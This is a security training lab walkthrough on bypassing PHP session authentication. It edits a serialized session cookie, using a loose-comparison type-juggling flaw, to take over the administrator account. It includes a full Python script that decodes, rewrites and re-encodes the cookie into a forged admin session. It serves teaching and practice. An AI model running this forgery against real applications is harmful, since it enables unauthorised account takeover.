Lab: Modifying serialized data types
This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos.
You can log in to your own account using the following credentials:
To access another user's account, you will need to exploit a quirk in how PHP compares data of different types: with the loose comparison operator (==), PHP versions before 8.0 convert a non-numeric string to the integer 0 before comparing it with an integer, so 0 == "<any non-numeric token>" evaluates to true. PHP 8 changed this behaviour (a non-numeric string is instead compared against the integer as text), so the bypass depends on the server's PHP version.
- Log in using your own credentials. URL-decode and Base64-decode the session cookie to reveal a serialized PHP object.
- Change the username to administrator and update the length of the attribute to 13 (the serialized length prefix must match the new byte length of the string, otherwise unserialization fails).
- Change the access token to the integer 0. Remember to update the data type label by replacing s with i, and drop the length prefix and quotes that a string value carries. The modified object should look like this:
- Base64 and URL-encode the object. Copy the URL-encoded string to your clipboard.
- In Burp Repeater, use your modified session cookie to access the administrator account and delete Carlos.
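The steps above can be scripted so the length prefix and type label are never edited by hand. The following is an added example, not code from the lab or from PortSwigger: it decodes the cookie, parses the flat serialized PHP object, rewrites the two properties, re-serializes with a recomputed string length and an integer type tag, and re-encodes. The class name "User", the property names "username" and "access_token", and the sample username and token in SAMPLE_OBJECT are constructed assumptions for illustration, since the page does not show the real object. The two small helpers at the end emulate PHP's int-versus-string loose comparison before and after PHP 8, to show why the integer 0 matches the token on older versions and why it stops working on newer ones.

```python
import base64
import re
import urllib.parse

# Constructed sample session value: a serialized PHP object. The class name,
# property names, username and token are assumptions made for this example.
SAMPLE_OBJECT = (b'O:4:"User":2:{s:8:"username";s:6:"wiener";'
                 b's:12:"access_token";s:32:"' + b"a" * 32 + b'";}')


def decode_cookie(cookie: str) -> bytes:
    """URL-decode, then Base64-decode the session cookie to the raw serialized object."""
    return base64.b64decode(urllib.parse.unquote(cookie))


def encode_cookie(serialized: bytes) -> str:
    """Base64-encode, then URL-encode (including '=', '+' and '/') for a Cookie header."""
    return urllib.parse.quote(base64.b64encode(serialized).decode(), safe="")


def read_scalar(data: bytes, pos: int):
    """Parse one scalar token (s, i, b, d or N) at pos; return (python_value, next_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"N":
        return None, pos + 2
    if tag in (b"i", b"b", b"d"):
        end = data.index(b";", pos)
        body = data[pos + 2:end]
        if tag == b"i":
            return int(body), end + 1
        if tag == b"b":
            return body == b"1", end + 1
        return float(body), end + 1
    if tag == b"s":
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])      # declared BYTE length of the string
        start = colon + 2                      # skip ':"'
        raw = data[start:start + length]       # length-delimited, so quotes inside are fine
        if data[start + length:start + length + 2] != b'";':
            raise ValueError(f"string length mismatch at offset {pos}")
        return raw.decode(), start + length + 2
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")


def parse_object(data: bytes):
    """Parse O:<n>:"Class":<count>:{key;value;...} with scalar properties only.
    Returns (class_name, [(key, value), ...]) preserving property order."""
    if not data.startswith(b"O:"):
        raise ValueError("not a serialized PHP object")
    colon = data.index(b":", 2)
    name_len = int(data[2:colon])
    cls = data[colon + 2:colon + 2 + name_len].decode()
    pos = colon + 2 + name_len + 2             # skip '":'
    end = data.index(b":", pos)
    count = int(data[pos:end])
    pos = end + 2                              # skip ':{'
    props = []
    for _ in range(count):
        key, pos = read_scalar(data, pos)
        value, pos = read_scalar(data, pos)
        props.append((key, value))
    if data[pos:pos + 1] != b"}":
        raise ValueError("malformed object body")
    return cls, props


def serialize_scalar(value) -> bytes:
    """Emit a scalar with the right type tag; strings get a freshly computed byte length."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):                # checked before int: bool subclasses int
        return b"b:1;" if value else b"b:0;"
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, float):
        return b"d:%s;" % repr(value).encode()
    raw = value.encode()
    return b's:%d:"%s";' % (len(raw), raw)


def serialize_object(cls: str, props) -> bytes:
    body = b"".join(serialize_scalar(k) + serialize_scalar(v) for k, v in props)
    name = cls.encode()
    return b'O:%d:"%s":%d:{%s}' % (len(name), name, len(props), body)


def forge_admin_cookie(cookie: str) -> str:
    """Rewrite username and turn access_token into the integer 0, then re-encode."""
    cls, props = parse_object(decode_cookie(cookie))
    forged = []
    for key, value in props:
        if key == "username":
            value = "administrator"           # re-serialized as s:13:"administrator"
        elif key == "access_token":
            value = 0                         # s:N:"..." becomes i:0;
        forged.append((key, value))
    return encode_cookie(serialize_object(cls, forged))


def php7_int_equals_string(i: int, s: str) -> bool:
    """Emulate PHP < 8 '==' between an int and a string: the string is converted to an
    int (its leading numeric prefix, otherwise 0), so 0 == "<random token>" is True."""
    m = re.match(r"\s*[+-]?\d+", s)
    return i == (int(m.group()) if m else 0)


def php8_int_equals_string(i: int, s: str) -> bool:
    """Emulate PHP >= 8: only a fully numeric string compares numerically; otherwise the
    int is cast to a string and compared as text, which closes this bypass."""
    if re.fullmatch(r"\s*[+-]?(\d+\.?\d*|\.\d+)(e[+-]?\d+)?\s*", s, re.IGNORECASE):
        return float(i) == float(s)
    return str(i) == s
```

Paste the value returned by forge_admin_cookie into the session cookie of the request in Burp Repeater. The parser deliberately reads strings by their declared byte length rather than by scanning for the closing quote, which is also the reason a hand-edited length prefix that does not match the new value makes unserialize() reject the whole object.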